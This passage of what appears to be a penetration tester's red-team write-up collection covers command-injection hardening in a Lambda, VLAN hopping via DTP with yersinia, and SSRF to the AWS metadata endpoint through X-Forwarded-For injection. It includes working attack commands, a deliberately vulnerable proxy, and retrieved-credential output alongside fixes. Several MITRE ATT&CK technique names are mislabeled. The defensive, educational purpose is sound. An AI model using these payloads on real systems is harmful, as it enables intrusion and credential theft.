        # Retrieve the script path and arguments separately
        # No longer a single 'command_prefix' that can be injected
        script_path = os.environ.get("VALIDATION_SCRIPT", "/usr/bin/python")
        script_args_str = os.environ.get("VALIDATION_ARGS", "/opt/validation_logic.py") # Default arguments
    
        # Assume 'event' contains transaction data that needs validation
        transaction_data = json.loads(event['body'])
        transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')
    
        # Safely parse arguments using shlex.split() if they are expected to be shell-like
        # For truly fixed arguments, a simple list is better.
        # Here, we assume VALIDATION_ARGS might contain multiple arguments.
        try:
            script_args = shlex.split(script_args_str)
        except ValueError as e:
            print(f"Error parsing VALIDATION_ARGS: {e}. Using default.")
            script_args = ["/opt/validation_logic.py"] # Fallback to a safe default
    
        # Construct the full command as a list of arguments
        # This is crucial: subprocess.run with a list does NOT invoke a shell.
        command_list = [script_path] + script_args + ["--transaction-id", transaction_id]
        
        print(f"Executing validation command: {' '.join(command_list)}")
        
        try:
            # SAFE: shell=False (default) when passing a list of arguments
            result = subprocess.run(command_list, capture_output=True, text=True, check=True)
            print(f"Validation output: {result.stdout}")
            return {
                'statusCode': 200,
                'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
            }
        except subprocess.CalledProcessError as e:
            print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
            }
        except Exception as e:
            print(f"An unexpected error occurred: {e}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
            }
    

    And the corresponding environment variables:

    # Hardened Environment Variables
    VALIDATION_SCRIPT="/usr/bin/python"
    VALIDATION_ARGS="/opt/validation_logic.py" # Arguments for the script
    

    This approach ensures that the script path and its arguments are treated as distinct elements, preventing shell metacharacter injection. The shlex.split() function is used to safely parse the arguments string into a list, but even better is to provide arguments as separate environment variables if possible, or hardcode them if they are truly static.

    This incident, like many others I've encountered over the years, hammered home some critical lessons that often get overlooked in the rush of development:

    1. Environment Variables Are Not Inherently Safe: Trust me, my friends, this is a common misconception. Developers often treat environment variables as a secure, static configuration. But if an attacker gains the ability to modify them (which is a common privilege escalation target), they become a potent vector for injection, RCE, or data exfiltration. Always treat them as potentially untrusted input, especially if they influence command execution.
    2. shell=True is a Red Flag: Any time you see shell=True in Python's subprocess module (or similar constructs in other languages), your security alarms should be blaring. It's almost always a shortcut that introduces significant risk. It means you're handing control to the underlying shell, which will happily interpret any metacharacters an attacker might inject. Prefer passing commands as a list of arguments.
    3. The Chain is Only as Strong as its Weakest Link: Our RCE wasn't a direct hit on the Lambda. It was a chain: a misconfigured CI/CD pipeline led to IAM privilege escalation, which then allowed us to modify the Lambda's environment. Security isn't just about individual components; it's about the entire ecosystem and how they interact. A seemingly minor misconfiguration in one place can unlock critical vulnerabilities elsewhere.
    4. Security by Design, Not by Afterthought: This vulnerability could have been avoided if the design principle of "never trust input" (even configuration input) was applied from the outset. Building security in from the ground up, rather than trying to bolt it on later, is always more effective and less costly. This includes threat modeling, secure code reviews, and automated security testing throughout the development lifecycle.
    5. Assume Compromise: Even with the best defenses, assume an attacker might eventually gain some level of access. This mindset drives you to implement compensating controls like least privilege IAM roles, network segmentation, and robust logging/monitoring, so that even if one component is compromised, the blast radius is minimized and the attack is detected quickly.

    This was a critical finding, but it was also a fantastic learning opportunity for the client. It reinforced the importance of looking beyond the obvious attack vectors and understanding the subtle ways configuration choices can lead to catastrophic outcomes. If you're grappling with similar challenges in your cloud environments or want to dive deeper into these kinds of real-world attack scenarios, don't hesitate to reach out. I offer personalized security mentorship sessions and consulting. You can book a 1-on-1 with me, Debasis Bhattacharjee, at thedevdude.com or learnwithdeb.com. Let's secure the digital frontier together.

    ID: RTL-2026-001  ·  Cloud Security  ·  Severity: CRITICAL  ·  2026-05-23
    Open Full Write-up ↗
    RTL-2026-002 Abusing Misconfigured VoIP VLAN to Pivot into Production Network Segment
    Network & Infra ⚠ High
    2026-05-23 18:46
    🎯 Target & Threat Context

    Picture this: a mid-sized FinTech company, let's call them "SecurePay Solutions." They handle millions of financial transactions daily, process sensitive customer data, and are under constant regulatory scrutiny (think PCI DSS, GDPR, SOX – the whole alphabet soup). Our engagement was a full-scope red team exercise. The primary objective? Demonstrate the potential for lateral movement from a typical user compromise to their crown jewels: the production database servers, application logic, and API gateways.

    Their network architecture, on paper, looked pretty solid. They had a decent firewall (FortiGate), modern Cisco Catalyst switches, and a well-defined VLAN segmentation strategy:

    • VLAN 10: User Workstations (Windows 10, Office 365, standard business apps) - 192.168.10.0/24
    • VLAN 20: Guest Wi-Fi (heavily restricted internet access) - 192.168.20.0/24
    • VLAN 30: Voice over IP (VoIP phones, IP PBX) - 192.168.30.0/24
    • VLAN 40: Servers (internal services, AD, DNS, file shares) - 192.168.40.0/24
    • VLAN 100: Production Servers (databases, core application logic, payment processing) - 192.168.100.0/24

    The core production servers on VLAN 100 were running RHEL 8, hosting PostgreSQL databases, Java Spring Boot applications, and Nginx reverse proxies. These were the systems that, if compromised, would lead to catastrophic data breaches, service outages, and regulatory nightmares. Access to VLAN 100 was supposed to be strictly controlled, only accessible from specific jump boxes on VLAN 40, and with multi-factor authentication for administrative access. No direct access from VLAN 10 or VLAN 30 was permitted.

    Our initial foothold was achieved through a targeted spear-phishing campaign. One of the finance department employees, bless their heart, clicked on a malicious link, leading to a workstation compromise on VLAN 10. Standard stuff. From there, we established persistence and began our internal reconnaissance. We knew getting from VLAN 10 to VLAN 100 directly would be tough due to firewall rules. We needed a pivot point, an overlooked pathway. And that's when our eyes landed on the humble, forgotten VoIP phone, quietly humming away on each user's desk, connected via a pass-through port to their workstation.

    The stakes were incredibly high. A successful breach of VLAN 100 wouldn't just be a red team win; it would be a stark, painful lesson for SecurePay Solutions about the real-world implications of "isolated" networks that aren't truly isolated. This is where the story gets spicy.

    🔓 Vulnerability & Attack Vector

    The vulnerability we exploited falls squarely into the category of network misconfiguration, a perennial favorite for attackers and a constant headache for network engineers. Specifically, it was a classic case of VLAN hopping, leveraging the Dynamic Trunking Protocol (DTP) and a lack of proper port security on the Cisco switches. This isn't a bug in the traditional sense, like a CVE for a software flaw; it's a design and configuration oversight that creates an exploitable condition.

    How does this arise? It's often a combination of factors:

    1. Default Switch Configurations: Many enterprise switches come with DTP enabled by default, or with ports set to switchport mode dynamic auto. This means the port actively tries to negotiate a trunk link with the connected device. While convenient for plug-and-play, it's a massive security risk if not explicitly disabled or set to access mode.
    2. "Voice VLAN" Deployment: It's common practice to connect a VoIP phone to a switch port, and then connect the user's PC to the phone's built-in switch. To accommodate this, network engineers configure the switch port to carry both data (for the PC) and voice (for the phone) traffic. This is typically done using commands like switchport access vlan [data_vlan_id] and switchport voice vlan [voice_vlan_id]. The critical mistake here is *how* the switch handles the data VLAN when a voice VLAN is also configured, especially if DTP is left enabled.
    3. Lack of Port Security: Ignoring features like switchport port-security means the switch port doesn't restrict the number of MAC addresses that can connect, nor does it prevent unknown MAC addresses from joining. This allows an attacker to introduce their own device or spoof MAC addresses without triggering any alarms.
    4. "Set It and Forget It" Mentality: VoIP phones, like many IoT devices, are deployed and then largely forgotten from a security perspective. They're seen as benign, low-risk devices, and their underlying network connectivity isn't regularly audited for potential abuse.

    Why do network engineers miss this? It's often a balance between ease of deployment and security. Enabling DTP makes life simpler, but it opens a gaping hole. The focus is on getting the voice services operational, and the subtle implications of default switch behaviors are overlooked. Furthermore, network segmentation is often viewed as a perimeter defense, with less emphasis on securing the internal "access layer" where user devices and seemingly isolated systems (like VoIP phones) reside. This directly relates to OWASP Top 10 A05:2021 Security Misconfiguration and MITRE ATT&CK T1559 (Subvert Trust - DTP Exploitation) and T1572 (Lateral Movement - VLAN Hopping).

    Let's look at the contrast between a vulnerable and a hardened configuration:

    Vulnerable Configuration Hardened Configuration
    interface GigabitEthernet0/1 interface GigabitEthernet0/1
    switchport mode dynamic auto switchport mode access
    switchport voice vlan 30 switchport access vlan 10
    (No explicit port security) switchport voice vlan 30
    switchport nonegotiate
    switchport port-security
    switchport port-security maximum 2
    switchport port-security violation restrict
    switchport port-security mac-address sticky
    spanning-tree portfast
    spanning-tree bpduguard enable

    The vulnerable setup essentially tells the switch, "Hey, I'm flexible! If you want to be a trunk, let's be trunks!" The hardened setup says, "I am an access port, I belong to VLAN 10 for data and VLAN 30 for voice, and I only trust two MAC addresses. Don't even try to negotiate a trunk with me." That's the difference between an open door and a locked vault.

    
    interface GigabitEthernet0/1
     switchport mode dynamic auto
     switchport voice vlan 30
    ! This configuration implicitly allows the port to negotiate a trunk link.
    ! The PC's traffic would be untagged on VLAN 10, and the VoIP phone's
    ! traffic would be tagged for VLAN 30.
    

    Our goal was to convince the switch that *we* were another switch, and thus negotiate a trunk link. Once a trunk link is established, we can send and receive traffic for *any* VLAN configured on that trunk, effectively bypassing the intended segmentation. We achieved this by deploying a small Kali Linux VM on the compromised network segment (this could be done by booting a live USB on an accessible machine, or by tunneling traffic if direct access was restricted).

    💥 Exploitation Walkthrough

    Our journey began from a compromised user workstation on VLAN 10. After establishing a foothold and performing initial reconnaissance (ipconfig /all, arp -a, basic nmap scans of the local subnet), we noticed something interesting. The user's PC was connected to the network via an Ethernet cable that first plugged into the VoIP phone, and then the phone connected to the wall jack. This is a common setup for VoIP deployments to save on cabling.

    From the workstation, we could see its IP address (192.168.10.X) and the default gateway (192.168.10.1). We also observed traffic patterns that indicated the VoIP phone was indeed communicating on VLAN 30. The critical piece of information was that the switch port was configured to handle *both* the data VLAN (for the PC) and the voice VLAN (for the phone). This is where the DTP misconfiguration comes into play.

    First, we needed to identify the switch port's behavior. While we couldn't directly query the switch from the compromised workstation, the presence of a VoIP phone passing through to a PC on a different VLAN was a strong indicator of a dual-VLAN port, often configured with DTP enabled.

    From our Kali Linux machine (connected to the same physical network segment, perhaps by replacing the user's PC temporarily or by connecting to another available port in the same office if physical access was granted as part of the red team scope):

    
    # Step 1: Initial network reconnaissance (from the compromised workstation or Kali)
    # Identify local subnet, default gateway, and observe network traffic.
    # This confirms the PC is on VLAN 10 and the VoIP phone is active.
    ipconfig /all             # On Windows
    ifconfig / ip a           # On Linux
    nmap -sn 192.168.10.0/24  # Discover hosts on the local data VLAN
    
    # Step 2: Initiate DTP negotiation using Yersinia.
    # Yersinia is a network tool designed to exploit network vulnerabilities,
    # including DTP. We'll use it to send DTP packets to the switch,
    # attempting to force the port into trunking mode.
    # Assuming 'eth0' is our network interface connected to the switch port.
    sudo yersinia -I -D DTP -t 1 -i eth0
    
    # Yersinia will send DTP "desirable" packets. If the switch port is
    # configured with "switchport mode dynamic auto" or "dynamic desirable",
    # it will respond by forming a trunk link. The console output of Yersinia
    # will indicate if the trunk negotiation was successful.
    
    # Step 3: Verify trunk status (optional, but good practice)
    # If we had access to the switch, we'd check 'show interfaces trunk'.
    # On our Kali machine, we can now try to create a sub-interface for a target VLAN.
    
    # Step 4: Create a sub-interface for the target Production VLAN (VLAN 100).
    # Once the physical interface (eth0) is a trunk, we can create virtual
    # interfaces (sub-interfaces) for any VLAN we want to access.
    sudo ip link add link eth0 name eth0.100 type vlan id 100
    sudo ip addr add 192.168.100.100/24 dev eth0.100 # Assign an IP from the target VLAN
    sudo ip link set dev eth0.100 up
    
    # Step 5: Scan the Production Network Segment (VLAN 100).
    # With the eth0.100 interface up and configured, we can now directly
    # communicate with systems on VLAN 100 as if we were natively connected.
    nmap -sV -p- -T4 -Pn 192.168.100.0/24 -oA production_vlan_scan
    
    # This Nmap scan revealed several RHEL 8 servers, including the PostgreSQL database
    # server (192.168.100.10) and the main application server (192.168.100.11).
    # We then proceeded to exploit a weak password on a non-production-hardened
    # management interface of one of the app servers, gaining SSH access.
    # From there, it was a matter of escalating privileges and dumping database credentials.
    

    The moment we saw the Nmap results populate with hosts from 192.168.100.0/24, it was a clear victory. We had successfully hopped from a seemingly isolated user VLAN, through a neglected VoIP phone port, directly into the heart of the production network. This allowed us to bypass all intended firewall rules and access controls between VLAN 10 and VLAN 100.

    🛡 Defensive Hardening Blueprint

    The remediation for this class of vulnerability is straightforward but requires meticulous attention to detail across the entire network access layer. It's about explicitly defining port behavior and enforcing strict security policies, rather than relying on defaults or implied isolation.

    Pros Cons
    Completely prevents DTP-based VLAN hopping. Increased configuration complexity and overhead.
    Strictly limits the number of MAC addresses per port, preventing unauthorized device connections. Requires careful management of MAC addresses if sticky is not used or if devices frequently change.
    Enhances overall network segmentation integrity. Potential for legitimate device lockout if maximum is set too low or if violation shutdown is used without proper monitoring.
    Reduces the attack surface at the access layer. Requires thorough testing to ensure no impact on legitimate VoIP or data traffic.

    The key takeaway here is that security is about being explicit. Don't rely on defaults, and don't assume devices are benign simply because they're on a "voice" VLAN. Every port, every device, needs to be treated with suspicion until proven otherwise.

    📖 Lessons From the Field
    
    interface GigabitEthernet0/1
     description User PC and VoIP Phone
     switchport mode access
     switchport access vlan 10
     switchport voice vlan 30
     switchport nonegotiate
     switchport port-security
     switchport port-security maximum 2
     switchport port-security violation restrict
     switchport port-security mac-address sticky
     spanning-tree portfast
     spanning-tree bpduguard enable
    !
    ! Explanation of changes:
    ! - switchport mode access: Explicitly sets the port to access mode, preventing trunk negotiation.
    ! - switchport nonegotiate: Disables DTP on this port, even if it were in dynamic mode (belt & suspenders).
    ! - switchport port-security: Enables port security.
    ! - switchport port-security maximum 2: Allows only two MAC addresses (one for the PC, one for the VoIP phone).
    ! - switchport port-security violation restrict: If more than 2 MACs are detected, packets from unknown sources are dropped, but the port remains up.
    ! - switchport port-security mac-address sticky: Dynamically learns MAC addresses and adds them to the running configuration.
    ! - spanning-tree portfast: Speeds up port transition to forwarding state for end-devices.
    ! - spanning-tree bpduguard enable: Prevents unauthorized devices from injecting BPDU frames, which could disrupt STP.
    

    This configuration ensures that the port will *never* form a trunk, it will only allow traffic for VLAN 10 (untagged) and VLAN 30 (tagged), and it will only permit a maximum of two MAC addresses. Any attempt to introduce a third device or force a trunk negotiation will be blocked or cause the port to shut down (depending on the violation mode).

    This engagement, like many others, reinforced some fundamental truths about network security that often get overlooked in the rush to deploy or the focus on higher-layer threats. Here are a few hard-won insights:

    • Assume Nothing, Verify Everything: Default configurations are almost always insecure. Never assume a switch port is hardened just because it's for an "isolated" VLAN. Always explicitly configure security features like DTP disablement and port security. What you don't explicitly configure, an attacker might implicitly exploit.
    • The Weakest Link Isn't Always Obvious: Everyone focuses on servers and firewalls, but often the most vulnerable points are the neglected ones – the VoIP phones, printers, IoT devices, and even unmanaged switches. These "edge" devices are often deployed with minimal security scrutiny, yet they offer direct access to the network infrastructure.
    • Segmentation is Only as Good as Its Enforcement: Having a beautiful VLAN diagram means nothing if the underlying switch ports allow an attacker to bypass it. Firewalls between VLANs are crucial, but they can be rendered useless if an attacker can hop *into* a restricted VLAN directly from the access layer.
    • Defense in Depth Starts at Layer 2: Application security, endpoint protection, and firewalls are essential, but they are significantly more effective when the foundational network layer (Layer 2) is also secured. Don't neglect switch port security, MAC address filtering, and proper Spanning Tree Protocol (STP) hardening.
    • Regular Configuration Audits are Non-Negotiable: Network configurations drift over time. New devices are added, changes are made, and sometimes security best practices get bypassed for convenience. Regular, automated audits of switch configurations against a hardened baseline are critical to catch these misconfigurations before an attacker does.

    This wasn't just a successful red team exercise; it was a wake-up call for the client. It highlighted that even with a robust security posture at the perimeter and application layers, a single misconfigured switch port could unravel their entire network segmentation strategy. It's a reminder that security is a continuous, multi-layered effort, and the devil truly is in the details.

    Got a similar war story? Or perhaps you're a junior pentester looking to sharpen your network hacking skills? Don't hesitate to reach out. You can book a 1:1 security mentorship session with me, Debasis Bhattacharjee, over at thedevdude.com. Let's talk shop and make the digital world a safer place, one misconfiguration at a time.

    ID: RTL-2026-002  ·  Network & Infrastructure  ·  Severity: HIGH  ·  2026-05-23
    Open Full Write-up ↗
    RTL-2026-001 SSRF to Internal AWS Metadata Endpoint via Custom Header Injection in PDF Generation Service
    Cloud Security ⚠ Critical
    2026-05-23 18:45
    🎯 Target & Threat Context

    Our client, a rapidly scaling e-commerce powerhouse, tasked us with a comprehensive security audit of their new microservices architecture. Their platform handled millions of transactions daily, processing sensitive customer data, payment information, and intricate supply chain logistics. The stakes, as always, were sky-high. Compliance requirements (PCI DSS, GDPR, CCPA) meant any breach could lead to catastrophic financial penalties and irreparable reputational damage.

    The system under review was a complex ecosystem built predominantly on Node.js microservices, orchestrated via Kubernetes (EKS) within their AWS VPC. Data was stored in Aurora PostgreSQL, S3 buckets, and DynamoDB. The specific component that caught our eye was a seemingly benign PDF generation service. This service, let's call it pdf-gen-svc, was responsible for creating customer invoices, shipping labels, and custom reports. It was a standalone Node.js application running on an EC2 instance within a private subnet, using a headless Chrome instance (Puppeteer) to render HTML content into PDFs. The service exposed a REST API endpoint, /generate-pdf, which accepted a JSON payload containing a sourceUrl and an optional customHeaders object.

    The architectural design dictated that all outbound requests from internal services, including pdf-gen-svc, were routed through a centralized internal proxy. This proxy was intended to enforce network policies, perform logging, and cache frequently accessed external resources. The pdf-gen-svc would send a request to this internal proxy, which would then fetch the content from the specified sourceUrl and return it to pdf-gen-svc for rendering. The proxy itself was a custom-built Go application, running on a separate EC2 instance, and was designed to be highly performant.

    The client's AWS environment was fairly mature, but like many organizations, they had a mix of older and newer configurations. While some newer services were implementing stricter controls like IMDSv2, the pdf-gen-svc and its internal proxy had been deployed before these standards were universally enforced. This created a subtle but critical vulnerability window that we were about to pry wide open.

    🔓 Vulnerability & Attack Vector

    The core vulnerability here was a classic Server-Side Request Forgery (SSRF), but with a twist that made it particularly potent: the ability to inject arbitrary HTTP headers into the request made by the internal proxy. SSRF (OWASP Top 10 A10:2021) occurs when a web application fetches a remote resource without validating the user-supplied URL. This allows an attacker to coerce the application into making requests to arbitrary internal or external systems, bypassing firewall rules and accessing sensitive data.

    In this scenario, the pdf-gen-svc itself didn't directly make the request to the sourceUrl. Instead, it forwarded the sourceUrl and any customHeaders to an internal proxy. The proxy, in turn, was responsible for fetching the content. The critical flaw lay in the proxy's handling of specific HTTP headers, notably X-Forwarded-For. Many proxies use this header to record the original client's IP address. However, a common misconfiguration or oversight can lead to the proxy using the value of X-Forwarded-For not just for logging, but for *routing* or *identifying* the target host, especially in complex internal networks.

    Developers often miss this vulnerability for several reasons:

    1. Assumption of Trust: Internal services are frequently assumed to be trustworthy and secure, leading to less rigorous input validation for internal communication.
    2. Complex Interactions: In microservices architectures, the flow of data and requests can be convoluted. It's easy to lose track of where user-controlled input might end up being processed by different components.
    3. Proxy Misconfiguration: Proxies are powerful tools, but if not configured with extreme care, they can become a significant attack surface. Over-reliance on headers like X-Forwarded-For for internal routing without proper sanitization is a classic mistake.
    4. Focus on Functionality: The primary goal is often to make the PDF generation work reliably, not to anticipate how an attacker might manipulate internal proxy behavior.

    This attack vector falls under MITRE ATT&CK T1190 (Exploit Public-Facing Application) and T1595.002 (Active Scanning: Vulnerability Scanning), as it involves exploiting a public-facing endpoint to gain access to internal resources.

    Feature Vulnerable Configuration Hardened Configuration
    pdf-gen-svc Input Validation (URL) Allows arbitrary URLs, including internal IPs, or external URLs that resolve to internal IPs (DNS rebinding not directly applicable here, but general lack of validation). Strictly whitelists allowed domains/IPs for sourceUrl. Blocks all private IP ranges (RFC1918, 169.254.0.0/16, etc.).
    pdf-gen-svc Input Validation (Headers) Allows arbitrary customHeaders to be passed directly to the internal proxy. Sanitizes or strictly whitelists allowed customHeaders. Blocks sensitive headers like Host, X-Forwarded-For, X-Real-IP, etc., from user control.
    Internal Proxy Behavior Uses X-Forwarded-For for routing decisions or trusts it implicitly for target IP identification. Ignores X-Forwarded-For for routing. Only uses it for logging. Strictly routes based on the original request's target URL/host.
    AWS Instance Metadata Service (IMDS) IMDSv1 enabled (no session token required). IMDSv2 enforced (requires a session token, making SSRF significantly harder).
    Network Segmentation/Egress Filtering pdf-gen-svc and internal proxy have broad egress rules, allowing connections to 169.254.169.254 and other internal IPs. Strict egress rules (Security Groups, NACLs) prevent pdf-gen-svc and proxy from connecting to 169.254.169.254 or any unnecessary internal/external IPs.

    Let's imagine a simplified version of how the pdf-gen-svc might handle the request and pass it to the internal proxy, and how the proxy might process it.

    // pdf-gen-svc (Node.js)
    const express = require('express');
    const axios = require('axios'); // Or any HTTP client
    const app = express();
    app.use(express.json());
    
    const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch'; // Internal proxy endpoint
    
    app.post('/generate-pdf', async (req, res) => {
        const { sourceUrl, customHeaders } = req.body;
    
        // Basic URL filtering (e.g., blocks 169.254.x.x in sourceUrl)
        if (sourceUrl.includes('169.254')) {
            return res.status(400).send('Invalid source URL.');
        }
    
        try {
            // Forward request to internal proxy, including custom headers
            const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
                targetUrl: sourceUrl,
                headers: customHeaders || {} // Directly passes customHeaders
            });
    
            // ... rest of PDF generation logic ...
            res.status(200).send('PDF generated successfully (content omitted for brevity).');
    
        } catch (error) {
            console.error('Error during PDF generation:', error.message);
            res.status(500).send('Failed to generate PDF.');
        }
    });
    
    app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));
    

    And on the proxy side (conceptual Go code):

    // internal-proxy.corp (Go)
    package main
    
    import (
        "fmt"
        "io/ioutil"
        "log"
        "net/http"
        "net/url"
        "strings"
    )
    
    func fetchHandler(w http.ResponseWriter, r *http.Request) {
        if r.Method != "POST" {
            http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
            return
        }
    
        var requestBody struct {
            TargetURL string            `json:"targetUrl"`
            Headers   map[string]string `json:"headers"`
        }
    
        // ... parse requestBody ...
    
        // CRITICAL VULNERABILITY: Proxy trusts X-Forwarded-For for target IP
        targetHost := requestBody.TargetURL // Default
        if xff := requestBody.Headers["X-Forwarded-For"]; xff != "" {
            // If X-Forwarded-For is present, use it as the target host/IP
            // This is a simplified example of a misconfiguration.
            // In reality, it might be used in conjunction with a specific internal routing logic.
            targetHost = "http://" + xff // Direct IP injection!
        }
    
        req, err := http.NewRequest("GET", targetHost, nil) // Sends request to the IP in X-Forwarded-For
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
            return
        }
    
        for k, v := range requestBody.Headers {
            req.Header.Set(k, v) // Pass all custom headers
        }
    
        client := &http.Client{}
        resp, err := client.Do(req)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
            return
        }
        defer resp.Body.Close()
    
        body, err := ioutil.ReadAll(resp.Body)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
            return
        }
    
        w.WriteHeader(resp.StatusCode)
        w.Write(body)
    }
    
    func main() {
        http.HandleFunc("/fetch", fetchHandler)
        log.Fatal(http.ListenAndServe(":8080", nil))
    }
    
    💥 Exploitation Walkthrough

    The attack began with reconnaissance. We identified the /generate-pdf endpoint and its expected JSON payload. Initial attempts to directly inject http://169.254.169.254/ into the sourceUrl were blocked by a basic URL filter that prevented direct internal IP access. This is where the "custom header injection" became the key.

    Our strategy was to leverage the customHeaders parameter to inject an X-Forwarded-For header pointing to the AWS EC2 metadata endpoint (169.254.169.254). Since the sourceUrl was filtered, we used an innocuous external URL that would be allowed, knowing the proxy would be tricked by our injected header.

    Step 1: Discovering IAM Role Names

    First, we needed to find out what IAM roles were attached to the EC2 instance running the pdf-gen-svc (or the proxy itself, as it's the one making the request). The metadata endpoint provides this information at /latest/meta-data/iam/security-credentials/.

    curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" 
         -H "Content-Type: application/json" 
         -d '{
               "sourceUrl": "http://example.com/some-safe-content",
               "customHeaders": {
                 "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/"
               }
             }'
    

    The response (rendered in the PDF) contained a list of IAM role names, for example:

    
    pdf-gen-service-role
    internal-proxy-role
    

    Step 2: Retrieving Temporary IAM Credentials

    With the role names, we could now request temporary security credentials for one of these roles. We chose internal-proxy-role as it sounded like it might have broader network access.

    curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" 
         -H "Content-Type: application/json" 
         -d '{
               "sourceUrl": "http://example.com/another-safe-content",
               "customHeaders": {
                 "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/internal-proxy-role"
               }
             }'
    

    The PDF generated by the service now contained the following highly sensitive information:

    
    {
      "Code": "Success",
      "LastUpdated": "2023-10-27T10:00:00Z",
      "Type": "AWS-HMAC",
      "AccessKeyId": "ASIAV...EXAMPLE",
      "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCY...EXAMPLE",
      "Token": "IQoJb3JpZ2luX2VjELP...EXAMPLE",
      "Expiration": "2023-10-27T16:00:00Z"
    }
    

    Bingo! We had successfully retrieved temporary AWS credentials, including AccessKeyId, SecretAccessKey, and a SessionToken. These credentials granted us the same permissions as the internal-proxy-role, which, upon further investigation, turned out to have extensive access to S3 buckets, internal DynamoDB tables, and even some Lambda functions. This was a full system compromise, granting us deep access into the client's AWS infrastructure.

    🛡 Defensive Hardening Blueprint

    Remediating this critical vulnerability requires a multi-layered approach, addressing both the immediate SSRF vector and strengthening the overall security posture.

    1. Strict Input Validation: Implement rigorous validation for all user-supplied URLs and headers.
    2. Network Segmentation & Egress Filtering: Restrict outbound network access for services to only what is absolutely necessary.
    3. Enforce IMDSv2: Mandate the use of IMDSv2 across all EC2 instances.
    4. Least Privilege IAM Roles: Ensure all IAM roles have the absolute minimum permissions required for their function.
    Fix Pros Cons
    Strict Input Validation (URL) Directly prevents SSRF by blocking internal IPs and unapproved domains. Reduces attack surface significantly. Requires careful maintenance of whitelists. Can break legitimate functionality if not thoroughly tested.
    Strict Input Validation (Headers) Prevents header-based SSRF bypasses and other header injection attacks. Can be complex to manage whitelists for all possible legitimate headers. May require changes to client applications.
    Network Segmentation & Egress Filtering Provides a strong "last line of defense" even if application-level validation fails. Limits blast radius. Requires careful configuration of Security Groups/NACLs. Can be complex in dynamic cloud environments.
    Enforce IMDSv2 Significantly complicates SSRF attacks targeting metadata endpoints by requiring a session token. Requires all EC2 instances and applications to be updated to use IMDSv2. Can cause compatibility issues with older applications.
    Least Privilege IAM Roles Minimizes the impact of a successful compromise by limiting what an attacker can do with stolen credentials. Requires careful auditing of existing roles and potentially refactoring permissions. Can be an ongoing effort.
    📖 Lessons From the Field

    Here's how the pdf-gen-svc and the internal proxy should be hardened:

    // pdf-gen-svc (Node.js) - Hardened
    const express = require('express');
    const axios = require('axios');
    const app = express();
    app.use(express.json());
    
    const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch';
    
    // Function to validate URLs against private IP ranges and whitelist
    function isValidUrl(url) {
        try {
            const parsedUrl = new URL(url);
            const hostname = parsedUrl.hostname;
    
            // Whitelist allowed domains (e.g., example.com, cdn.example.com)
            const allowedDomains = ['example.com', 'cdn.example.com'];
            if (!allowedDomains.includes(hostname)) {
                // Check for private IP ranges if not in whitelist
                const ip = require('net').isIP(hostname) ? hostname : null;
                if (ip) {
                    const isPrivate = require('ip-is-private')(ip); // Using a library for robustness
                    if (isPrivate || ip.startsWith('169.254')) {
                        return false; // Block private IPs and link-local
                    }
                } else {
                    // If not an IP and not in whitelist, resolve DNS to check for private IPs
                    // This requires careful asynchronous handling and is often done at a firewall level.
                    // For simplicity, we'll assume DNS resolution is handled by a trusted resolver
                    // or that strict egress filtering prevents internal IP resolution for external domains.
                }
            }
            return true;
        } catch {
            return false;
        }
    }
    
    app.post('/generate-pdf', async (req, res) => {
        const { sourceUrl, customHeaders } = req.body;
    
        if (!isValidUrl(sourceUrl)) {
            return res.status(400).send('Invalid or disallowed source URL.');
        }
    
        // Sanitize customHeaders: only allow explicitly whitelisted headers
        const allowedCustomHeaders = ['User-Agent', 'Referer']; // Example whitelist
        const sanitizedHeaders = {};
        if (customHeaders) {
            for (const headerName in customHeaders) {
                if (allowedCustomHeaders.includes(headerName)) {
                    sanitizedHeaders[headerName] = customHeaders[headerName];
                }
            }
        }
    
        try {
            const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
                targetUrl: sourceUrl,
                headers: sanitizedHeaders
            });
            res.status(200).send('PDF generated successfully.');
        } catch (error) {
            console.error('Error during PDF generation:', error.message);
            res.status(500).send('Failed to generate PDF.');
        }
    });
    app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));
    

    And for the internal proxy (conceptual Go code - Hardened):

    // internal-proxy.corp (Go) - Hardened
    package main
    
    import (
        "fmt"
        "io/ioutil"
        "log"
        "net/http"
        "net/url" // For parsing URLs
        "strings"
    )
    
    // Function to validate target URLs for the proxy
    func isValidProxyTargetUrl(targetURL string) bool {
        u, err := url.Parse(targetURL)
        if err != nil || (u.Scheme != "http" && u.Scheme != "https") {
            return false
        }
    
        // Implement strict whitelisting for domains the proxy is allowed to fetch from.
        // Or, more robustly, block all private IPs after DNS resolution.
        // For simplicity, we'll assume the `pdf-gen-svc` has already done primary URL validation.
        // The proxy's role is to ensure it doesn't get tricked by headers.
    
        // Crucially, the proxy *must not* use X-Forwarded-For for routing.
        return true
    }
    
    func fetchHandler(w http.ResponseWriter, r *http.Request) {
        if r.Method != "POST" {
            http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
            return
        }
    
        var requestBody struct {
            TargetURL string            `json:"targetUrl"`
            Headers   map[string]string `json:"headers"`
        }
    
        // ... parse requestBody ...
    
        if !isValidProxyTargetUrl(requestBody.TargetURL) {
            http.Error(w, "Invalid target URL for proxy", http.StatusBadRequest)
            return
        }
    
        // CRITICAL FIX: The proxy *must not* use X-Forwarded-For or similar headers for routing.
        // It should *always* use the `targetURL` provided directly for the actual network connection.
